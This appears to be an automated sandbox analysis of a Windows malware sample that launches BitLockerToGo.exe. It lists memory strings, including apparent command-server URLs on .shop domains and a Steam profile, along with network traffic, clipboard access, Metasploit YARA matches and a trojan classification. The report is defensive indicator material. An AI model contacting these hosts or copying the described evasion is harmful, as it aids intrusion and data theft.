              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: 7wN7BF7WfX.exeString found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictnot
              Source: BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pumpkinkwquo.shop/api
              Source: BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/
              Source: BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/&7
              Source: BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/.7
              Source: BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/N7
              Source: BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/V7
              Source: BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/api
              Source: BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/api_
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041744613.0000000002C0C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/e
              Source: BitLockerToGo.exe, 00000004.00000002.2041942999.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765638924.0000000002CAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900N
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/~7
              Source: BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
              Source: BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: BitLockerToGo.exe, 00000004.00000002.2041942999.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765638924.0000000002CAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C0C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://surroundeocw.shop/api
              Source: 7wN7BF7WfX.exeString found in binary or memory: https://www.certum.pl/CPS0
              Source: 7wN7BF7WfX.exeString found in binary or memory: https://www.globalsign.com/repository/0
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownHTTPS traffic detected: 104.21.8.235:443 -> 192.168.2.7:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.209.193:443 -> 192.168.2.7:49711 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B39500 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_02B39500
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B39500 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_02B39500

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.1736916326.000000C000860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: 00000000.00000002.1736585848.000000C000480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B104E04_2_02B104E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B0FE904_2_02B0FE90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B492904_2_02B49290
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B4A2F04_2_02B4A2F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B052D04_2_02B052D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B112D04_2_02B112D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B2C2274_2_02B2C227
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B452604_2_02B45260
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B4826A4_2_02B4826A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B073B04_2_02B073B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B013114_2_02B01311
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B2E37B4_2_02B2E37B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B0B0B04_2_02B0B0B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B010004_2_02B01000
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B390704_2_02B39070
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B4A0604_2_02B4A060
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B0C0504_2_02B0C050
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B336094_2_02B33609
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B087B04_2_02B087B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B497904_2_02B49790
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B037304_2_02B03730
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B487364_2_02B48736
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B207704_2_02B20770
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B4A7404_2_02B4A740
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B0A4D04_2_02B0A4D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B4A4104_2_02B4A410
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B2E58F4_2_02B2E58F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B0E5304_2_02B0E530
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B285544_2_02B28554
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B0B5404_2_02B0B540
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B2AAFA4_2_02B2AAFA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B0AA204_2_02B0AA20
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B2CA404_2_02B2CA40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B10BD34_2_02B10BD3
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B289F04_2_02B289F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B289D24_2_02B289D2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B3F9104_2_02B3F910
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B4B9104_2_02B4B910
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B139444_2_02B13944
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B06EB04_2_02B06EB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B49E804_2_02B49E80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B09E3C4_2_02B09E3C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B07E104_2_02B07E10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B2CE704_2_02B2CE70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B10C004_2_02B10C00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02B1DEA0 appears 171 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02B0CB30 appears 47 times
              Source: 7wN7BF7WfX.exeStatic PE information: Number of sections : 12 > 10
              Source: 7wN7BF7WfX.exe, 00000000.00000003.1709351969.00000182F7E00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 7wN7BF7WfX.exe
              Source: 7wN7BF7WfX.exe, 00000000.00000003.1709321267.00000182F7E40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 7wN7BF7WfX.exe
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1736916326.000000C000800000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 7wN7BF7WfX.exe
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0006A2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 7wN7BF7WfX.exe
              Source: 00000000.00000002.1736916326.000000C000860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: 00000000.00000002.1736585848.000000C000480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: 7wN7BF7WfX.exeBinary string: bindm in unexpected GOOSrunqsteal: runq overflowdouble traceGCSweepStartbad use of trace.seqlockx509: malformed validityexec: Stdout already setjson: unsupported type: Invalid Semantic Versioninvalid pattern syntax: address string too shortresource length too longunpacking Question.Classidna: disallowed rune %U^[a-zA-Z_][a-zA-Z0-9_]*$unable to resolve %s: %vunable to resolve %v: %qgoogle.protobuf.Duration\Device\NamedPipe\cygwinAsia Pacific (Hong Kong)Asia Pacific (Hyderabad)Asia Pacific (Singapore)Asia Pacific (Melbourne)athena.ap-east-1.api.awsathena.ca-west-1.api.awsathena.eu-west-1.api.awsathena.eu-west-2.api.awsathena.eu-west-3.api.awsathena.sa-east-1.api.awsathena.us-east-1.api.awsathena.us-east-2.api.awsathena.us-west-1.api.awsathena.us-west-2.api.awscloudfront.amazonaws.comaos.ca-central-1.api.awsaos.eu-central-1.api.awsaos.eu-central-2.api.awsaos.il-central-1.api.awsaos.me-central-1.api.awslambda.ap-east-1.api.awslambda.ca-west-1.api.awslambda.eu-west-1.api.awslambda.eu-west-2.api.awslambda.eu-west-3.api.awslambda.sa-east-1.api.awslambda.us-east-1.api.awslambda.us-east-2.api.awslambda.us-west-1.api.awslambda.us-west-2.api.awsrekognition.ca-central-1budgets.amazonaws.com.cnroute53.amazonaws.com.cnacm.{region}.{dnsSuffix}dms.{region}.{dnsSuffix}ec2.{region}.{dnsSuffix}eks.{region}.{dnsSuffix}iam.us-gov.amazonaws.compi.us-gov-east-1.api.awspi.us-gov-west-1.api.awsrds.{region}.{dnsSuffix}sqs.{region}.{dnsSuffix}ssm.{region}.{dnsSuffix}sts.{region}.{dnsSuffix}flate: maxBits too largestreamSafe was not resetmismatching enum lengthsGODEBUG sys/cpu: value "", required CPU feature
              Source: classification engineClassification label: mal93.troj.evad.winEXE@3/0@11/3
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B273F0 CoCreateInstance,4_2_02B273F0
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeFile created: C:\Users\Public\Libraries\ckkih.scifJump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeFile opened: C:\Windows\system32\e2d5521d9292b68b83bceb8b9b97cda812fa9566cbe25e6a1115af684d3a4beaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
              Source: 7wN7BF7WfX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 7wN7BF7WfX.exeReversingLabs: Detection: 36%
              Source: 7wN7BF7WfX.exeString found in binary or memory: net/addrselect.go
              Source: 7wN7BF7WfX.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
              Source: 7wN7BF7WfX.exeString found in binary or memory: cGLtrQzJjn/load.go
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeFile read: C:\Users\user\Desktop\7wN7BF7WfX.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\7wN7BF7WfX.exe "C:\Users\user\Desktop\7wN7BF7WfX.exe"
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
